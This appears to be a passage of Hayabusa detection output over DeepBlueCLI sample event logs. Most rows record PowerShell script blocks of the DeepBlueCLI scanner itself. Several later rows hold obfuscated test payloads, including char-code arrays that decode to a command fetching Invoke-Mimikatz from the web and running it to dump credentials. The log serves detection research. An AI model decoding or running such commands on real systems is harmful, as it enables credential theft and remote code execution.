# This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.985 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.987 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:01:22.441 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:01:22.441 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:01:22.442 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace "">"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars > characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:01:22.443 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:01:28.780 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:08.894 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:08.929 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:08.986 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:09.026 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:09.052 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:09.081 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:09.119 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:09.152 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:09.159 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:09.176 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:09.189 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:09.191 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:09.237 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:28.360 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"iNVOkE-expRessION (( [RUNTiMe.inTEROPsErVices.MARsHaL]::ptrTOsTRINgautO( [runTIME.IntErOPsERvIceS.MarSHAL]::SEcureSTRIngtObsTr($('76492d1116743f0423413b16050a5345MgB8AFEAcwB0AHAAaAAwAGEAWABRAG8AcgBMAEMAdAAyAFgANwAyAGsATABCAFEAPQA9AHwAZQBjADMAOAAxAGYAOAA4ADcANAA2ADIAYQAzADgANwBjADIANgAyAGYAYQA0ADYAYgBhADAANgBmADkAZgA4AGYAZQBiADQANgBlADAAYwAxADYAYwBmADIAZABhADEAMgA5ADQANwA0ADEAMAA1ADAAYQA1ADQAMwBmADAAMAAyAGEAYgBiADMAMQBhADgAMgBjADUAYQBkADcAMwBlADAAMQA4ADAANABiADEAYwA2AGQAOQAwADMAMgA0ADYAMgA5ADcAZgAwAGMAMwBkADUANABiAGYAOAAwADEAMQBmAGIAYQBhADAAOABiADIANwAxADQAMgAxADUANgAxADQAZgBlAGYAOQBiADQAMwAwADEAMAA3ADQAZQA3AGMAYgBkADQANQBlADAANwBkADYAYQBhADMAYwA1AGUAZQBhAGUANAAzADEANgBlAGQAOQA4ADcAMQAyADYAOABlADEAMgAxADkAYQBmADgANwBkAGIAOQBhADMAYgAzAGQAZAA1AGMANAA4ADcAZgBhAGYAYQBhAGUAZQBmAGIAOAA2ADAAMAAwADkAYgAwAGEAZgA1AGEAYwBmADUANgBjAGIAMQA5ADIAYQBmADYAYwAzADAAYwBlADYAYwA3AGIANQAxAGEAMQBlADMANwBjADYAMgBmAGQAZAAxADUAMAA0ADcAMQBiAGMAOQBkAGQAOAA5ADYAMwAwAGEAOQBjAGUANQAzADQANwA2ADkAZgAyAGYAOQA2ADgANgA2ADEAMQAxADkAYwBkADYAZQA2AGQAZABlAGEANgBlAGMAYwA0ADYANwBjAGMAYQAyADAAMQBmADUAZgA4ADUANAA4ADMANwA2AGYAOAAxADIAYQBhAGUAYgBjADMAYQAwADYAOQA5AGMAZQBjADkAOQAzADkAMQA0ADIANAAyAGEAZgAwAGUAYwA2ADIANwBlAGUANwBmADQANwBmADgAMgA2ADkANQAxAGMAMwBmAGQAMQA5ADMANwAzAGEAOAA0AGQANAA2AGIAZAA3ADQAYgAwAGIAMQAwADIAZgBkADMAYQBmADEAYgBiADkAYgAzADYAMQA5ADQANQA2ADQAMQA1ADcAMwA2ADYAMQA0ADAAMABlAGQANAAyADQAYQA2ADYAMwA0AGMAZQBiAGUAZQBkADUAYgAxADkANwBlAGMANgA1ADkANQAyADcAYQBmADYAYQA0ADYAMQBmAGUAOABkADEAOAAwAGMAMwBkAGUAYgBlAGEAMAAzADIAYgA1ADYAYQA5AGEAMABjADYAZAAwADQANABiAGYAZABjADMANwA0ADgAYwA1ADMAZQBjAGQAMQA4ADAAMQAwAGIAYQBhAGEAMAA1AGUAZgAyAGUAZABlAGMAMwA5ADkAMQAyADAAZgBjADgANwAyAGEANwA3ADcAOQA2AGUAZQBjADkAYwAwADIANQBjAGIAOAA2AGQAOQBkAGQAMQBjAGUANABlAGUAMABjADcAMQA3ADkANQAzAGQAOQA3AGUAYgBjAGEANgBmADMANwAxADYAMwBiAGMAYgA5ADQANQAxADQANAAxAGQAMABiADIAMQA0ADEAMQA3ADUAMAA4AGEAMAA4ADUAOABlADcAOABlADYANQA2ADQAZQAwADcANAA3ADYANQA5ADYAYQA5ADcANgAyADgANwAyADIAMwAyADEAZgA1ADkAYgBkADUANgA0AGEAMgBlAGEAYwBiADUAZQAwAGEANQAxAGEAOQAwADMANQA2ADYAMQBiAGMAYQA2ADgAMQA3ADAAOQBjADgAMwA5AGQAOQBhADUANgA1ADIAMABlADMAMgBiAGIAMwA4ADMAZAA5ADQAYwAxAGUANgBlADcANQBmAGIAOQAzADAANAAwAGMAZAA1AGQAYwA5AGEAMgA2ADcAMABjADcAOABhADQANgBiAGUAYQA4ADUAMgA='|CoNverTTo-secuReStriNG -k 82,189,200,92,184,235,46,38,211,250,202,240,198,208,70,100,210,121,211,227,2,148,77,154,149,200,93,130,24,30,119,255) ) )) )",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:28.360 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"iNVOkE-expRessION (( [RUNTiMe.inTEROPsErVices.MARsHaL]::ptrTOsTRINgautO( [runTIME.IntErOPsERvIceS.MarSHAL]::SEcureSTRIngtObsTr($('76492d1116743f0423413b16050a5345MgB8AFEAcwB0AHAAaAAwAGEAWABRAG8AcgBMAEMAdAAyAFgANwAyAGsATABCAFEAPQA9AHwAZQBjADMAOAAxAGYAOAA4ADcANAA2ADIAYQAzADgANwBjADIANgAyAGYAYQA0ADYAYgBhADAANgBmADkAZgA4AGYAZQBiADQANgBlADAAYwAxADYAYwBmADIAZABhADEAMgA5ADQANwA0ADEAMAA1ADAAYQA1ADQAMwBmADAAMAAyAGEAYgBiADMAMQBhADgAMgBjADUAYQBkADcAMwBlADAAMQA4ADAANABiADEAYwA2AGQAOQAwADMAMgA0ADYAMgA5ADcAZgAwAGMAMwBkADUANABiAGYAOAAwADEAMQBmAGIAYQBhADAAOABiADIANwAxADQAMgAxADUANgAxADQAZgBlAGYAOQBiADQAMwAwADEAMAA3ADQAZQA3AGMAYgBkADQANQBlADAANwBkADYAYQBhADMAYwA1AGUAZQBhAGUANAAzADEANgBlAGQAOQA4ADcAMQAyADYAOABlADEAMgAxADkAYQBmADgANwBkAGIAOQBhADMAYgAzAGQAZAA1AGMANAA4ADcAZgBhAGYAYQBhAGUAZQBmAGIAOAA2ADAAMAAwADkAYgAwAGEAZgA1AGEAYwBmADUANgBjAGIAMQA5ADIAYQBmADYAYwAzADAAYwBlADYAYwA3AGIANQAxAGEAMQBlADMANwBjADYAMgBmAGQAZAAxADUAMAA0ADcAMQBiAGMAOQBkAGQAOAA5ADYAMwAwAGEAOQBjAGUANQAzADQANwA2ADkAZgAyAGYAOQA2ADgANgA2ADEAMQAxADkAYwBkADYAZQA2AGQAZABlAGEANgBlAGMAYwA0ADYANwBjAGMAYQAyADAAMQBmADUAZgA4ADUANAA4ADMANwA2AGYAOAAxADIAYQBhAGUAYgBjADMAYQAwADYAOQA5AGMAZQBjADkAOQAzADkAMQA0ADIANAAyAGEAZgAwAGUAYwA2ADIANwBlAGUANwBmADQANwBmADgAMgA2ADkANQAxAGMAMwBmAGQAMQA5ADMANwAzAGEAOAA0AGQANAA2AGIAZAA3ADQAYgAwAGIAMQAwADIAZgBkADMAYQBmADEAYgBiADkAYgAzADYAMQA5ADQANQA2ADQAMQA1ADcAMwA2ADYAMQA0ADAAMABlAGQANAAyADQAYQA2ADYAMwA0AGMAZQBiAGUAZQBkADUAYgAxADkANwBlAGMANgA1ADkANQAyADcAYQBmADYAYQA0ADYAMQBmAGUAOABkADEAOAAwAGMAMwBkAGUAYgBlAGEAMAAzADIAYgA1ADYAYQA5AGEAMABjADYAZAAwADQANABiAGYAZABjADMANwA0ADgAYwA1ADMAZQBjAGQAMQA4ADAAMQAwAGIAYQBhAGEAMAA1AGUAZgAyAGUAZABlAGMAMwA5ADkAMQAyADAAZgBjADgANwAyAGEANwA3ADcAOQA2AGUAZQBjADkAYwAwADIANQBjAGIAOAA2AGQAOQBkAGQAMQBjAGUANABlAGUAMABjADcAMQA3ADkANQAzAGQAOQA3AGUAYgBjAGEANgBmADMANwAxADYAMwBiAGMAYgA5ADQANQAxADQANAAxAGQAMABiADIAMQA0ADEAMQA3ADUAMAA4AGEAMAA4ADUAOABlADcAOABlADYANQA2ADQAZQAwADcANAA3ADYANQA5ADYAYQA5ADcANgAyADgANwAyADIAMwAyADEAZgA1ADkAYgBkADUANgA0AGEAMgBlAGEAYwBiADUAZQAwAGEANQAxAGEAOQAwADMANQA2ADYAMQBiAGMAYQA2ADgAMQA3ADAAOQBjADgAMwA5AGQAOQBhADUANgA1ADIAMABlADMAMgBiAGIAMwA4ADMAZAA5ADQAYwAxAGUANgBlADcANQBmAGIAOQAzADAANAAwAGMAZAA1AGQAYwA5AGEAMgA2ADcAMABjADcAOABhADQANgBiAGUAYQA4ADUAMgA='|CoNverTTo-secuReStriNG -k 82,189,200,92,184,235,46,38,211,250,202,240,198,208,70,100,210,121,211,227,2,148,77,154,149,200,93,130,24,30,119,255) ) )) )",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:12:28.360 +00:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 19:13:38.198 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"& ( $eNv:COmSPEc[4,15,25]-JoIN'') ([ChAr[]] (73, 69 , 88 ,32 ,40,78 ,101 ,119 ,45, 79, 98,106 ,101,99 , 116 ,32 ,78,101, 116, 46,87, 101 ,98 , 67 ,108 ,105,101 ,110, 116 ,41 , 46, 68, 111 ,119 , 110 , 108 , 111 ,97 ,100 , 83,116, 114,105 , 110, 103, 40 , 39, 104, 116 , 116,112 , 115,58,47,47 ,114, 97 ,119,46 , 103,105 , 116, 104,117, 98 ,117 , 115 , 101 ,114,99, 111 ,110 , 116,101 ,110 , 116, 46 , 99 , 111,109 ,47 ,109 ,97,116 , 116,105,102, 101 , 115 , 116,97 , 116 ,105 ,111 , 110,47,80,111 ,119 , 101,114,83, 112, 108,111, 105,116 ,47,109, 97 , 115 , 116, 101 ,114,47 ,69 ,120, 102,105, 108,116 , 114, 97,116 , 105,111,110, 47 , 73,110 ,118 ,111 , 107 , 101,45 , 77, 105 ,109 , 105, 107 , 97 , 116, 122 , 46 ,112 ,115, 49, 39 ,41 , 59 , 32,73 , 110 , 118 ,111 ,107 ,101,45,77,105 , 109 ,105, 107 ,97, 116 ,122,32 ,45 , 68 ,117 ,109,112 , 67 ,114 , 101,100 , 115 )-join '')",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:13:52.552 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"[sTRInG]::jOiN('' , (( 49 ,45 , 58,20,28 , '4e',65,77 , '2d' ,'4f' ,62 , '6a' , 65,63, 74 ,20 ,'4e', 65 ,74 ,'2e' ,57, 65 , 62,43 ,'6c',69, 65 , '6e' , 74 ,29 ,'2e',44,'6f' , 77 ,'6e','6c' , '6f' ,61, 64 ,53 , 74,72 ,69 ,'6e',67, 28, 27 , 68 ,74, 74,70 ,73, '3a', '2f','2f', 72, 61, 77 , '2e',67,69, 74 ,68 , 75,62, 75, 73,65 ,72,63, '6f','6e',74 ,65, '6e', 74 ,'2e',63 ,'6f', '6d','2f' , '6d', 61 ,74 ,74, 69,66 , 65, 73 ,74 ,61, 74 , 69 ,'6f' , '6e', '2f' ,50,'6f',77, 65,72,53 ,70, '6c' , '6f' ,69 ,74, '2f' , '6d' , 61 , 73 , 74,65,72 , '2f' ,45,78,66, 69, '6c', 74 , 72,61, 74,69,'6f' , '6e' , '2f' , 49,'6e' , 76, '6f','6b' ,65 , '2d' , '4d' ,69,'6d' , 69, '6b',61 , 74 , '7a' , '2e',70, 73 , 31 , 27, 29 ,'3b' ,20 ,49 ,'6e' , 76,'6f', '6b', 65, '2d', '4d',69, '6d' ,69,'6b' , 61 ,74, '7a' , 20 , '2d' ,44 , 75,'6d' , 70, 43, 72 ,65 ,64 , 73)|FoReaCh{ ([ChaR] ([Convert]::TOiNt16(($_.tOsTriNg()),16 )))}))|&( $enV:PuBlic[13]+$eNv:PUbliC[5]+'X')",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-30 19:13:52.553 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ ([ChaR] ([Convert]::TOiNt16(($_.tOsTriNg()),16 